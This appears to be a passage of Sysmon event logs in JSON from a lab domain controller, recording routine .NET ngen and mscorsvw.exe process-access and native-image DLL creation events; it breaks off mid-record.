{"EventTime":"2020-08-01 08:06:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7746,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:23.163\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-227F-5F25-0000-001043E00E00}\r\nTargetProcessId: 4632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:23.163","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-227F-5F25-0000-001043E00E00}","TargetProcessId":"4632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7747,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:25.038\r\nProcessGuid: {41C8662E-227F-5F25-0000-001043E00E00}\r\nProcessId: 4632\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1218-0\\System.Data.SqlXml.dll\r\nCreationUtcTime: 2020-08-01 08:06:25.038","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:25.038","ProcessGuid":"{41C8662E-227F-5F25-0000-001043E00E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1218-0\\System.Data.SqlXml.dll","CreationUtcTime":"2020-08-01 08:06:25.038","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7748,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.100\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.100","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7749,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.100\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.100","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7750,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.116\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-0010AAE40E00}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.116","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-0010AAE40E00}","TargetProcessId":"2584","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7751,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.178\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-001036E80E00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.178","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-001036E80E00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7752,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.178\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-001036E80E00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.178","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-001036E80E00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7753,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:25.178\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2281-5F25-0000-001036E80E00}\r\nTargetProcessId: 2852\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:25.178","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2281-5F25-0000-001036E80E00}","TargetProcessId":"2852","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7754,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:26.178\r\nProcessGuid: {41C8662E-2281-5F25-0000-001036E80E00}\r\nProcessId: 2852\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b24-0\\System.Deployment.dll\r\nCreationUtcTime: 2020-08-01 08:06:26.178","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:26.178","ProcessGuid":"{41C8662E-2281-5F25-0000-001036E80E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b24-0\\System.Deployment.dll","CreationUtcTime":"2020-08-01 08:06:26.178","EventReceivedTime":"2020-08-01 08:06:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7755,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:26.225\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2282-5F25-0000-001054EC0E00}\r\nTargetProcessId: 4132\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 